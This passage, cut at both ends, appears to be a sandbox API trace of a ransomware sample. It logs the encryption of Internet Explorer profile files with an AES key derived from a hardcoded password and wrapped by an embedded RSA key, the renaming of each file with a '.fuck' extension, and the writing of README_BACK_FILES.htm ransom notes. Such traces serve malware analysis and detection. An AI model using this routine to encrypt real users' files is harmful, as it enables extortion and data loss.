explorer\\domstore\\52uk17nv\\www.google[1].xml.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\52UK17NV\\www.google[1].xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\domstore\\52uk17nv\\www.google[1].xml"), bFailIfExists=0) returned 1 [0267.218] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\52UK17NV\\www.google[1].xml", dwFileAttributes=0x2000) returned 1 [0267.219] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\52UK17NV\\www.google[1].xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\domstore\\52uk17nv\\www.google[1].xml.gsg")) returned 1 [0267.220] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\52UK17NV\\www.google[1].xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\domstore\\52uk17nv\\www.google[1].xml"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\52UK17NV\\www.google[1].xml.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\domstore\\52uk17nv\\www.google[1].xml.fuck")) returned 1 [0267.221] CryptDestroyHash (hHash=0x2e7f880) returned 1 [0267.221] CryptDestroyKey (hKey=0x2e7f4c0) returned 1 [0267.221] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0267.221] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0267.221] FindClose (in: hFindFile=0x2e7ec80 | out: hFindFile=0x2e7ec80) returned 1 [0267.221] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\52UK17NV\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\domstore\\52uk17nv\\readme_back_files.htm")) returned 0xffffffff [0267.221] AreFileApisANSI () returned 1 [0267.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2df0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0267.221] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\52UK17NV\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\domstore\\52uk17nv\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0267.222] GetFileType (hFile=0x5d3c) returned 0x1 [0267.222] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0267.223] FindNextFileA (in: hFindFile=0x2e7eb80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0267.224] FindNextFileA (in: hFindFile=0x2e7eb80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0267.224] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\L8OQST1L\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2e7ec80 [0267.225] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0267.225] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0267.225] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0267.225] GetLastError () returned 0x0 [0267.225] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\L8OQST1L\\consent.google[1].xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\domstore\\l8oqst1l\\consent.google[1].xml")) returned 0x2020 [0267.226] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\L8OQST1L\\consent.google[1].xml", dwFileAttributes=0x80) returned 1 [0267.226] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\L8OQST1L\\consent.google[1].xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\domstore\\l8oqst1l\\consent.google[1].xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0267.227] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\L8OQST1L\\consent.google[1].xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\domstore\\l8oqst1l\\consent.google[1].xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0267.228] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\L8OQST1L\\consent.google[1].xml.gsg", dwFileAttributes=0x2) returned 1 [0267.228] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2e172e8) returned 1 [0267.230] CryptCreateHash (in: hProv=0x2e172e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0267.230] lstrlenA (lpString="JixXDiFnyqBuaFrBqjXDqBDQzMlQm") returned 29 [0267.231] CryptHashData (hHash=0x2e7f700, pbData=0x28cb3f0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0267.231] CryptDeriveKey (in: hProv=0x2e172e8, Algid=0x6610, hBaseData=0x2e7f700, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2e7f880) returned 1 [0267.231] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0267.231] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0267.231] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2e13ba8) returned 1 [0267.231] CryptImportPublicKeyInfo (in: hCryptProv=0x2e13ba8, dwCertEncodingType=0x1, pInfo=0x2eb0680*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb06b0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb06b8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2e7f480) returned 1 [0267.231] CryptEncrypt (in: hKey=0x2e7f480, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0267.231] CryptEncrypt (in: hKey=0x2e7f480, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e13cb8*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2e13cb8*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0267.232] WriteFile (in: hFile=0x5d44, lpBuffer=0x2e13cb8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2e13cb8*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0267.233] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0xd, lpOverlapped=0x0) returned 1 [0267.234] CryptEncrypt (in: hKey=0x2e7f880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0xd, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x10) returned 1 [0267.234] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x10, lpOverlapped=0x0) returned 1 [0267.234] CloseHandle (hObject=0x5d4c) returned 1 [0267.234] CloseHandle (hObject=0x5d44) returned 1 [0267.235] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\L8OQST1L\\consent.google[1].xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\domstore\\l8oqst1l\\consent.google[1].xml.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\L8OQST1L\\consent.google[1].xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\domstore\\l8oqst1l\\consent.google[1].xml"), bFailIfExists=0) returned 1 [0267.238] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\L8OQST1L\\consent.google[1].xml", dwFileAttributes=0x2000) returned 1 [0267.238] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\L8OQST1L\\consent.google[1].xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\domstore\\l8oqst1l\\consent.google[1].xml.gsg")) returned 1 [0267.240] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\L8OQST1L\\consent.google[1].xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\domstore\\l8oqst1l\\consent.google[1].xml"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\L8OQST1L\\consent.google[1].xml.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\domstore\\l8oqst1l\\consent.google[1].xml.fuck")) returned 1 [0267.242] CryptDestroyHash (hHash=0x2e7f700) returned 1 [0267.242] CryptDestroyKey (hKey=0x2e7f880) returned 1 [0267.242] CryptReleaseContext (hProv=0x2e172e8, dwFlags=0x0) returned 1 [0267.242] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0267.242] FindClose (in: hFindFile=0x2e7ec80 | out: hFindFile=0x2e7ec80) returned 1 [0267.242] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\L8OQST1L\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\domstore\\l8oqst1l\\readme_back_files.htm")) returned 0xffffffff [0267.242] AreFileApisANSI () returned 1 [0267.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0267.242] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\L8OQST1L\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\domstore\\l8oqst1l\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0267.243] GetFileType (hFile=0x5d3c) returned 0x1 [0267.244] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0267.245] FindNextFileA (in: hFindFile=0x2e7eb80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0267.245] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\Q6TJEFY5\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2e7ec80 [0267.246] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0267.246] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0267.246] FindClose (in: hFindFile=0x2e7ec80 | out: hFindFile=0x2e7ec80) returned 1 [0267.246] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\Q6TJEFY5\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\domstore\\q6tjefy5\\readme_back_files.htm")) returned 0xffffffff [0267.246] AreFileApisANSI () returned 1 [0267.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e29b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0267.246] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\Q6TJEFY5\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\domstore\\q6tjefy5\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0267.248] GetFileType (hFile=0x5d3c) returned 0x1 [0267.248] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0267.250] FindNextFileA (in: hFindFile=0x2e7eb80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0 [0267.250] FindClose (in: hFindFile=0x2e7eb80 | out: hFindFile=0x2e7eb80) returned 1 [0267.251] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\domstore\\readme_back_files.htm")) returned 0xffffffff [0267.251] AreFileApisANSI () returned 1 [0267.251] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28892e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0267.251] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\domstore\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0267.327] GetFileType (hFile=0x5d48) returned 0x1 [0267.327] WriteFile (in: hFile=0x5d48, lpBuffer=0x2b9d0c0*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d0b8, lpOverlapped=0x0 | out: lpBuffer=0x2b9d0c0*, lpNumberOfBytesWritten=0x2b9d0b8*=0x5ec, lpOverlapped=0x0) returned 1 [0267.328] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0267.328] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\EmieBrowserModeList\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x2e7eb80 [0267.329] FindNextFileA (in: hFindFile=0x2e7eb80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0267.329] FindNextFileA (in: hFindFile=0x2e7eb80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0267.329] FindNextFileA (in: hFindFile=0x2e7eb80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0 [0267.330] FindClose (in: hFindFile=0x2e7eb80 | out: hFindFile=0x2e7eb80) returned 1 [0267.331] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\EmieBrowserModeList\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\emiebrowsermodelist\\readme_back_files.htm")) returned 0xffffffff [0267.332] AreFileApisANSI () returned 1 [0267.332] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e29b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 107 [0267.332] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\EmieBrowserModeList\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\emiebrowsermodelist\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0267.333] GetFileType (hFile=0x5d48) returned 0x1 [0267.333] WriteFile (in: hFile=0x5d48, lpBuffer=0x2b9d0c0*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d0b8, lpOverlapped=0x0 | out: lpBuffer=0x2b9d0c0*, lpNumberOfBytesWritten=0x2b9d0b8*=0x5ec, lpOverlapped=0x0) returned 1 [0267.334] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0267.334] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\EmieSiteList\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x2e7eb80 [0267.334] FindNextFileA (in: hFindFile=0x2e7eb80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0267.334] FindNextFileA (in: hFindFile=0x2e7eb80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0267.335] FindNextFileA (in: hFindFile=0x2e7eb80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0 [0267.335] FindClose (in: hFindFile=0x2e7eb80 | out: hFindFile=0x2e7eb80) returned 1 [0267.335] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\EmieSiteList\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\emiesitelist\\readme_back_files.htm")) returned 0xffffffff [0267.335] AreFileApisANSI () returned 1 [0267.335] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 100 [0267.335] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\EmieSiteList\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\emiesitelist\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0267.337] GetFileType (hFile=0x5d48) returned 0x1 [0267.337] WriteFile (in: hFile=0x5d48, lpBuffer=0x2b9d0c0*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d0b8, lpOverlapped=0x0 | out: lpBuffer=0x2b9d0c0*, lpNumberOfBytesWritten=0x2b9d0b8*=0x5ec, lpOverlapped=0x0) returned 1 [0267.339] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0267.339] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\EmieUserList\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x2e7eb80 [0267.339] FindNextFileA (in: hFindFile=0x2e7eb80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0267.339] FindNextFileA (in: hFindFile=0x2e7eb80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0267.339] FindNextFileA (in: hFindFile=0x2e7eb80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0 [0267.339] FindClose (in: hFindFile=0x2e7eb80 | out: hFindFile=0x2e7eb80) returned 1 [0267.339] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\EmieUserList\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\emieuserlist\\readme_back_files.htm")) returned 0xffffffff [0267.339] AreFileApisANSI () returned 1 [0267.339] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 100 [0267.340] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\EmieUserList\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\emieuserlist\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0267.341] GetFileType (hFile=0x5d48) returned 0x1 [0267.341] WriteFile (in: hFile=0x5d48, lpBuffer=0x2b9d0c0*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d0b8, lpOverlapped=0x0 | out: lpBuffer=0x2b9d0c0*, lpNumberOfBytesWritten=0x2b9d0b8*=0x5ec, lpOverlapped=0x0) returned 1 [0267.342] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0267.342] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0267.342] GetLastError () returned 0x0 [0267.342] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\ie4uinit-ClearIconCache.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\ie4uinit-cleariconcache.log")) returned 0x20 [0267.342] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\ie4uinit-ClearIconCache.log", dwFileAttributes=0x80) returned 1 [0267.343] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\ie4uinit-ClearIconCache.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\ie4uinit-cleariconcache.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0267.344] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\ie4uinit-ClearIconCache.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\ie4uinit-cleariconcache.log.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0267.346] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\ie4uinit-ClearIconCache.log.gsg", dwFileAttributes=0x2) returned 1 [0267.346] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x2989270) returned 1 [0267.349] CryptCreateHash (in: hProv=0x2989270, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0267.349] lstrlenA (lpString="JixXDiFnyqBuaFrBqjXDqBDQzMlQm") returned 29 [0267.349] CryptHashData (hHash=0x2e7eb80, pbData=0x28cb5f8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0267.349] CryptDeriveKey (in: hProv=0x2989270, Algid=0x6610, hBaseData=0x2e7eb80, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x2e7f200) returned 1 [0267.349] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC 